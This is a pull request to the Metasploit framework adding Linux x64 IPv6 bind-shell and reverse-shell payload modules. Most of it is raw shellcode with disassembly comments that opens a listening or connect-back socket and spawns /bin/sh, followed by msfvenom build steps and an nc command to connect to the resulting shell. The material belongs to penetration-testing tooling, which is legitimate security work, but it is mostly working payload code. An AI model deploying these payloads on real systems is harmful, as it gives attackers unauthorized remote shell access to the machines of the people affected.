### PR TITLE
Add linux x64 ipv6 bind shell

### DIFF
--- a/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb
@@ -1,0 +1,114 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 115
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Linux x64 Command Shell, Bind TCP Inline (IPv6)',
+      'Description'   => 'Listen for an IPv6 connection and spawn a command shell',
+      'Author'        => 'epi <epibar052[at]gmail.com>',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_X64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LPORT'    => [ 21, 'n' ],
+            },
+          'Payload' =>
+            # <_start>:
+            "\x6a\x29"                	    +   #   push   0x29
+            "\x58"                   	    +   #   pop    rax
+            "\x6a\x0a"                	    +   #   push   0xa
+            "\x5f"                   	    +   #   pop    rdi
+            "\x6a\x01"                	    +   #   push   0x1
+            "\x5e"                   	    +   #   pop    rsi
+            "\x31\xd2"                	    +   #   xor    edx,edx
+            "\x0f\x05"                	    +   #   syscall
+            "\x89\xc7"               	    +   #   mov    edi,eax
+
+            # <populate_sockaddr_in6>:
+            "\x52"                   	    +   #   push   rdx
+            "\x52"                   	    +   #   push   rdx
+            "\x52"                   	    +   #   push   rdx
+            "\x52"                   	    +   #   push   rdx
+            "\x66\x68\x11\x5c"         	    +   #   pushw  0x5c11
+            "\x66\x6a\x0a"             	    +   #   pushw  0xa
+            "\x54"                   	    +   #   push   rsp
+            "\x5e"                   	    +   #   pop    rsi
+
+            # <bind_call>:
+            "\x6a\x31"                	    +   #   push   0x31
+            "\x58"                  	    +   #   pop    rax
+            "\x6a\x1c"                	    +   #   push   0x1c
+            "\x5a"                  	    +   #   pop    rdx
+            "\x0f\x05"                	    +   #   syscall
+
+            # <listen_call>:
+            "\x6a\x32"                	    +   #   push   0x32
+            "\x58"                   	    +   #   pop    rax
+            "\x6a\x01"                	    +   #   push   0x1
+            "\x5e"                   	    +   #   pop    rsi
+            "\x0f\x05"                	    +   #   syscall
+
+            # <accept_call>:
+            "\x6a\x2b"                	    +   #   push   0x2b
+            "\x58"                   	    +   #   pop    rax
+            "\x99"                   	    +   #   cdq
+            "\x52"                   	    +   #   push   rdx
+            "\x52"                   	    +   #   push   rdx
+            "\x48\x89\xe6"             	    +   #   mov    rsi,rsp
+            "\x6a\x1c"                	    +   #   push   0x1c
+            "\x48\x8d\x14\x24"         	    +   #   lea    rdx,[rsp]
+            "\x0f\x05"                	    +   #   syscall
+            "\x49\x89\xc7"             	    +   #   mov    r15,rax
+
+            # <dup2_calls>:
+            "\x6a\x03"                	    +   #   push   0x3
+            "\x59"                   	    +   #   pop    rcx
+            "\x6a\x02"                	    +   #   push   0x2
+            "\x5b"                   	    +   #   pop    rbx
+
+            # <dup2_loop>:
+            "\x6a\x21"                	    +   #   push   0x21
+            "\x58"                  	    +   #   pop    rax
+            "\x4c\x89\xff"             	    +   #   mov    rdi,r15
+            "\x89\xde"                	    +   #   mov    esi,ebx
+            "\x51"                  	    +   #   push   rcx
+            "\x0f\x05"                	    +   #   syscall
+            "\x59"                  	    +   #   pop    rcx
+            "\x48\xff\xcb"             	    +   #   dec    rbx
+            "\xe2\xef"                	    +   #   loop   401046 <dup2_loop>
+
+            # <exec_call>:
+            "\x31\xd2"                	    +   #   xor    edx,edx
+            "\x52"                   	    +   #   push   rdx
+            "\x48\xbb\x2f\x62\x69\x6e\x2f"  +   #   movabs rbx,0x68732f2f6e69622f
+            "\x2f\x73\x68"                  +   #
+            "\x53"                     	    +   #   push   rbx
+            "\x48\x89\xe7"                  +   #   mov    rdi,rsp
+            "\x52"                          +   #   push   rdx
+            "\x57"                          +   #   push   rdi
+            "\x48\x89\xe6"                  +   #   mov    rsi,rsp
+            "\x48\x8d\x42\x3b"              +   #   lea    rax,[rdx+0x3b]
+            "\x0f\x05"                          #   syscall
+        }
+      ))
+  end
+end

--- a/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb
@@ -128,7 +128,6 @@ module MetasploitModule
             push rsp
             pop rdi                             ; address of /bin/sh
             syscall
-
       EOS
 
       Metasm::Shellcode.assemble(Metasm::X86_64.new, payload).encode_string

--- a/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb
@@ -30,8 +30,8 @@ module MetasploitModule
           'Offsets' =>
             {
               'LHOST'    => [ 85, 'ADDR6' ],
-              'LPORT'    => [ 81, 'n' ],
-              'SCOPEID'  => [ 105,  'V' ]
+              'LPORT'    => [ 79, 'n' ],
+              'SCOPEID'  => [ 101,  'V' ]
             },
           'Payload' =>
             # <_start>:

--- a/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 105
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Linux x64 Command Shell, Reverse TCP Inline (IPv6)',
+      'Description'   => 'Connect back to attacker and spawn a command shell over IPv6',
+      'Author'        => 'epi <epibar052[at]gmail.com>',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_X64,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LHOST'    => [ 85, 'ADDR6' ],
+              'LPORT'    => [ 81, 'n' ],
+              'SCOPEID'  => [ 105,  'V' ]
+            },
+          'Payload' =>
+            # <_start>:
+            "\x6a\x29"                     +    #   push   0x29
+            "\x58"                         +    #   pop    rax
+            "\x6a\x0a"                     +    #   push   0xa
+            "\x5f"                         +    #   pop    rdi
+            "\x6a\x01"                     +    #   push   0x1
+            "\x5e"                         +    #   pop    rsi
+            "\x31\xd2"                     +    #   xor    edx,edx
+            "\x0f\x05"                     +    #   syscall
+            "\x50"                         +    #   push   rax
+            "\x5f"                         +    #   pop    rdi
+            "\xeb\x37"                     +    #   jmp    401048 <get_address>
+
+            # <populate_sockaddr_in6>:
+            "\x5e"                         +    #   pop    rsi
+
+            # <connect_call>:
+            "\x6a\x2a"                     +    #   push   0x2a
+            "\x58"                         +    #   pop    rax
+            "\x6a\x1c"                     +    #   push   0x1c
+            "\x5a"                         +    #   pop    rdx
+            "\x0f\x05"                     +    #   syscall
+
+            # <dup2_calls>:
+            "\x6a\x03"                     +    #   push   0x3
+            "\x59"                         +    #   pop    rcx
+            "\x6a\x02"                     +    #   push   0x2
+            "\x5b"                         +    #   pop    rbx
+
+            # <dup2_loop>:
+            "\x6a\x21"                     +    #   push   0x21
+            "\x58"                         +    #   pop    rax
+            "\x89\xde"                     +    #   mov    esi,ebx
+            "\x51"                         +    #   push   rcx
+            "\x0f\x05"                     +    #   syscall
+            "\x59"                         +    #   pop    rcx
+            "\x48\xff\xcb"                 +    #   dec    rbx
+            "\xe2\xf2"                     +    #   loop   40101e <dup2_loop>
+
+            # <exec_call>:
+            "\x31\xd2"                     + 	#   xor    edx,edx
+            "\x52"                   	   +    #   push   rdx
+            "\x48\xbb\x2f\x62\x69\x6e\x2f" +	#   movabs rbx,0x68732f2f6e69622f
+            "\x2f\x73\x68"                 +
+            "\x53"                   	   +    #   push   rbx
+            "\x54"                   	   +    #   push   rsp
+            "\x5f"                   	   +    #   pop    rdi
+            "\x52"                   	   +    #   push   rdx
+            "\x57"                   	   +    #   push   rdi
+            "\x54"                   	   +    #   push   rsp
+            "\x5e"                   	   +    #   pop    rsi
+            "\x48\x8d\x42\x3b"             +    #   lea    rax,[rdx+0x3b]
+            "\x0f\x05"                	   +    #   syscall
+
+            # <get_address>:
+            "\xe8\xc4\xff\xff\xff"         +    #   call   40100f <populate_sockaddr_in6>
+
+            # <sockaddr_in6>:
+            "\x0a\x00\x11\x5c"             +    #   sin6_family : sin6_port
+            "\x00\x00\x00\x00"             +    #   sin6_flowinfo
+            "\x00\x00\x00\x00"             +    #   sockaddr_in6
+            "\x00\x00\x00\x00"             +    #   ...
+            "\x00\x00\x00\x00"             +    #   ...
+            "\x00\x00\x00\x00"             +    #   16 bytes
+            "\x00\x00\x00\x00"                  #   sin6_scope_id
+        }
+      ))
+      register_options([
+         OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])
+      ])
+  end
+end


### PR DESCRIPTION
Implements inline x86_64 Linux bourne bind shell over IPv6.

## Verification

List the steps needed to make sure this thing works

- [ ] Select a port to listen on (default 4444)
- [ ] Build executable `msfvenom -p linux/x64/shell_bind_ipv6_tcp -o /tmp/test.bind.4444.elf -f elf`
- [ ] Start the listener `/tmp/test.bind.4444.elf -f elf`
- [ ] Connect to the listener `nc -nv6 ::1 4444`
- [ ] Run command to test shell works `id`

## Demonstration 
### Create elf and upload to remote machine (default port 4444)
![bind-loki-1](https://user-images.githubusercontent.com/43392618/49329080-af718f80-f53f-11e8-97c3-aeb438e3b387.png)
### Start listener and connect 
![bind-loki-2](https://user-images.githubusercontent.com/43392618/49329084-bd271500-f53f-11e8-975d-9e06badc4876.png)
### Create elf and upload to remote machine (non-default port 12345)
![bind-loki-3](https://user-images.githubusercontent.com/43392618/49329088-cadc9a80-f53f-11e8-8bf0-6e40576fdfb4.png)
### Start listener and connect 
![bind-loki-4](https://user-images.githubusercontent.com/43392618/49329090-cfa14e80-f53f-11e8-86f8-97265e023189.png)


